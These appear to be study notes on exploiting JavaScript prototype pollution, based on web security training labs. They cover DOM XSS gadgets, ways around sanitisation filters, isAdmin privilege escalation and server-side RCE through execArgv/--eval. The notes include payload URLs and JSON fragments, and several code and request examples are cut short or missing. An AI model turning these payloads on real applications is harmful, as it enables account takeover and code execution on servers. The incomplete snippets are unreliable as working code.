Prototype pollution

Prototype pollution is a JavaScript vulnerability that enables an attacker to add arbitrary properties to global object prototypes, which may then be inherited by user-defined objects.

Although prototype pollution is often unexploitable as a standalone vulnerability, it lets an attacker control properties of objects that would otherwise be inaccessible. If the application subsequently handles an attacker-controlled property in an unsafe way, this can potentially be chained with other vulnerabilities. In client-side JavaScript, this commonly leads to DOM XSS, while server-side prototype pollution can even result in remote code execution.

DOM Invader

DOM Invader provides a number of features to help you test for client-side prototype pollution vulnerabilities. These enable you to perform the following key tasks:

  • Automatically detect sources for prototype pollution in the URL and any JSON objects sent via web messages. This includes detecting alternative techniques using the same source.

  • Generate a proof of concept by polluting the Object.prototype using any discovered sources. You can then manually verify the vulnerability via the browser console.

  • Scan for potential gadgets that you can use to craft an exploit.


Client-side prototype pollution

DOM XSS via client-side prototype pollution

DOM Invader finds two sources:

For these sources, we can scan for gadgets (in order to exploit these sources):

It finds a Sink (script.src)

DOM Invader makes it very easy for us, we can now just click "Exploit" and it will chain a XSS with the prototype pollution:[transport_url]=data%3A%2Calert%281%29

Client-side prototype pollution via flawed sanitization

An obvious way in which websites attempt to prevent prototype pollution is by sanitizing property keys before merging them into an existing object. However, a common mistake is failing to recursively sanitize the input string. For example, consider the following URL:

If the sanitization process just strips the string __proto__ without repeating this process more than once, this would result in the following URL, which is a potentially valid prototype pollution source:

Example poor JS filter function:

function sanitizeKey(key) {
    let badProperties = ['constructor','__proto__','prototype'];
    for(let badProperty of badProperties) {
        key = key.replaceAll(badProperty, '');
    return key;

Prototype pollution via Object.defineProperty()

Developers with some knowledge of prototype pollution may attempt to block potential gadgets by using the Object.defineProperty() method. This enables you to set a non-configurable, non-writable property directly on the affected object as follows:

Object.defineProperty(vulnerableObject, 'gadgetProperty', {
    configurable: false,
    writable: false

In this case, an attacker may be able to bypass this defense by polluting Object.prototype with a malicious value property. If this is inherited by the descriptor object passed to Object.defineProperty(), the attacker-controlled value may be assigned to the gadget property after all.[value]=data%3A%2Calert%281%29

Server-side prototype pollution

JavaScript was originally a client-side language designed to run in browsers. However, due to the emergence of server-side runtimes, such as the hugely popular Node.js, JavaScript is now widely used to build servers, APIs, and other back-end applications. Logically, this means that it's also possible for prototype pollution vulnerabilities to arise in server-side contexts.

Detecting server-side prototype pollution via polluted property reflection

POST or PUT requests that submit JSON data to an application or API are prime candidates for this kind of behavior as it's common for servers to respond with a JSON representation of the new or updated object. In this case, you could attempt to pollute the global Object.prototype with an arbitrary property as follows:

POST /user/update HTTP/1.1

If the website is vulnerable, your injected property would then appear in the updated object in the response. We can perhaps use this vulnerability to escalate our privileges to admin:

if (this.status == 200) {
    const header = document.createElement("h3");
    header.textContent = 'Updated Billing and Delivery Address';
    for (const [key, value] of Object.entries(responseJson).filter(e => e[0] !== 'isAdmin')) {
        const label = document.createElement("label");
        label.textContent = `${toLabel(key)}`;
        const p = document.createElement("p");
        p.textContent = `${JSON.stringify(value).replaceAll("\"", "")}`;

Notice that the Object.entries looks at "isAdmin". We can set this to true using prototype pollution:

   "address_line_1":"Wiener HQ",
   "address_line_2":"One Wiener Way",
   "postcode":"BU1 1RPR",


   "address_line_1":"Wiener HQ",
   "address_line_2":"One Wiener Way",
   "postcode":"BU1 1RPR",

Detecting server-side prototype pollution without polluted property reflection

If you can find an object whose properties are visible in a response, you can use this to probe for sources. In the following example, we'll use UTF-7 encoding and a JSON source.

  1. Add an arbitrary UTF-7 encoded string to a property that's reflected in a response. For example, foo in UTF-7 is +AGYAbwBv-.

  1. Send the request. Servers won't use UTF-7 encoding by default, so this string should appear in the response in its encoded form.

  2. Try to pollute the prototype with a content-type property that explicitly specifies the UTF-7 character set:

        "content-type": "application/json; charset=utf-7"
  1. Repeat the first request. If you successfully polluted the prototype, the UTF-7 string should now be decoded in the response:


Bypassing flawed input filters for server-side prototype pollution

  1. Use the Server-Side prototype pollution scanner extension in Burp to scan a request

  2. If you find a source, instead of specifying __prototype__ directly, use the constructor:

"constructor": {
    "prototype": {

This suggests that the object doesn't have its own isAdmin property, but has instead inherited it from the polluted prototype.

Remote code execution via server-side prototype pollution

While client-side prototype pollution typically exposes the vulnerable website to DOM XSS, server-side prototype pollution can potentially result in remote code execution (RCE). Try polluting the prototype with a malicious execArgv property that adds the --eval argument to the spawned child process. Use this to call the execSync() sink, passing in a command that triggers an interaction with the public Burp Collaborator server. For example:

"__proto__": {

If their are successful HTTP requests coming in we can assume RCE. more info:

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